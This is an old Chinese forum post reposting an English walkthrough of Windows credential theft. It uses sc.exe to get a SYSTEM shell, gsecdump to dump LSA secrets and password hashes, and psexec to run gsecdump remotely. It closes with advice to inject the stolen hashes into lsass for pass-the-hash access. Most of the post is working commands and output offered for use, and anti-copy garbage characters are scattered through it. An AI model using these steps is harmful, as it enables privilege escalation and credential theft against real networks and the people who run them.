找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2067|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
1 `6 B  j  V5 [9 f4 a( h, d
. `( e. _' f  zC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact) P3 V2 ]8 E& w
[SC] CreateService SUCCESS+ y$ n- u) e3 A; r( D0 P
5 X) E$ s8 j9 A) ]3 t1 K! X
C:\>sc start shellcmdline
2 R  b  H% n5 ~3 A[SC] StartService FAILED 1053:4 L* b! U7 I1 f* o& n( }

6 y) Q5 ?; `+ X) z7 `  o$ E/ bThe service did not respond to the start or control request in a timely fashion.& z! {' n- w' D) p) v9 Y6 c
& l- i& }; R5 h
C:\>sc delete shellcmdline
2 B$ P: a6 o, x; Q[SC] DeleteService SUCCESS
* Y. u" R4 h4 M! ~
/ [9 A$ |: p1 F5 K* I, \/ V0 I------------
5 x! k! J) ?# A4 ]4 N: {; r) [+ b5 y' e4 ~1 L7 q" {# `6 u! @, U
Then in the new DOS window:
# D; ?/ Z% I! E3 w5 w# G; g4 ?8 p8 U! R8 f/ N( p
Microsoft Windows XP [Version 5.1.2600], D& u' k1 W4 g
(C) Copyright 1985-2001 Microsoft Corp./ X1 |9 @. Q* F' d0 L

3 H( r. t$ i- @C:\WINDOWS\system32>whoami
9 x1 W# b# a5 e; l7 SNT AUTHORITY\SYSTEM
# C: _6 d' L. ^3 x+ D
% G1 [( b4 M( ?5 wC:\WINDOWS\system32>gsecdump -h
  V; Z2 I! ?, [gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
. J% f- s( u2 v6 j8 n$ Vusage: gsecdump [options]
( |' ~! N3 L, {6 y) l2 k1 J8 y1 f5 x. [2 ~
options:% |5 M1 M5 v; K5 f7 d
-h [ --help ] show help
. g1 t2 H, j# x0 l4 z-a [ --dump_all ] dump all secrets9 T: G' [9 J7 w' {* Q
-l [ --dump_lsa ] dump lsa secrets9 g2 p5 s0 Q6 c& g
-w [ --dump_wireless ] dump microsoft wireless connections
$ O0 X6 y* L" d" E  E- E-u [ --dump_usedhashes ] dump hashes from active logon sessions
  n& q" b1 }. Z* ?-s [ --dump_hashes ] dump hashes from SAM/AD
9 _' r6 F6 `+ m2 o7 Q- B) s
* X8 K$ O, a) l1 X% d6 @. UAlthough I like to use:4 O3 `3 G/ }  ]5 l3 C; X

- t6 m+ i4 k& f- b% M& lPsExec v1.83 - Execute processes remotely
; q$ t4 v+ I, ]0 Y; t8 cCopyright (C) 2001-2007 Mark Russinovich, L- }5 E# U) O6 c" S  ^
Sysinternals - 链接标记[url]www.sysinternals.com[/url]" A5 Y% y& J6 z8 q

4 J# N  T9 w4 Z  C0 d% T* ~/ ?" bC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT/ o, j! W  [( ?

) V% z% o4 f$ n( Pto get the hashes from active logon sessions of a remote system.
% D5 o* A: Z" d+ ?7 |9 D8 Y5 j. }: ~4 o6 r
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
1 v/ r. C: B4 p  L/ G
1 B1 \8 `' E: `$ P& K- m" Q9 H! I# ^提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.9 M' Z% S3 l2 O! ~
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]: X4 f2 G  O7 e

/ X8 H+ J( V# O+ x( ]我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
- [5 O3 v" l# A: ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表